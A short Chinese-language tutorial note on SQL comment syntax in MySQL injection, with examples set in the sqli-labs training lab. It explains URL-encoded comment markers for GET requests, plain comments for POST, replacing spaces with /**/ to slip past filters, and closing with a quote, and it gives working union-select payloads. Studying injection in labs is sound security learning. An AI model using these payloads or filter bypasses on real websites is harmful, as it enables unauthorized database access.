sql注入的注释区别

以MySQL为例，我们知道mysql注释符有#、-- (后面有空格)、/**/三种，但是在sqlilabs注入中不同场景使用的注释符不同。

 

一、get型注入

在url栏中输入注入语句时，-- 和#注释都会报错

http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()-- 
http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()#

然而使用--+，--%20和%23就能成功注释（%20是空格的url编码，%23是#的url编码）

http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()--+
http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()--%20
http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()%23

原因：--+和--%20在传输到后端时会变成-- ，而url中的#号代表html页面中的锚点，数据传输过程并不会一起带到后端，所以需要使用%23

二、post型注入

直接使用-- 或#就行，因为是POST提交的数据，所以不用进行url编码，是POST原文

三、注释符/**/

因为注释符#、-- 都是把后面的语句全部注释掉了，而内联注释/**/则是注释指定部分，需要一前一后闭合，所以在传参那里几乎不做注释语句用，而是用于过滤空格等bypass，如：

?id=-1'/**/union/**/select/**/1,2,database()--+   //过滤空格,用/**/代替空格

内联注释是MySQL为了保持与其他数据兼容，将MySQL中特有的语句放在/!...*/中，这些语句在不兼容的数据库中不执行，而在MySQL自身却能识别，执行。/*!50001*/表示数据库版本>=5.00.01时中间的语句才能被执行

四、单引号（'）闭合后面的'

http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()'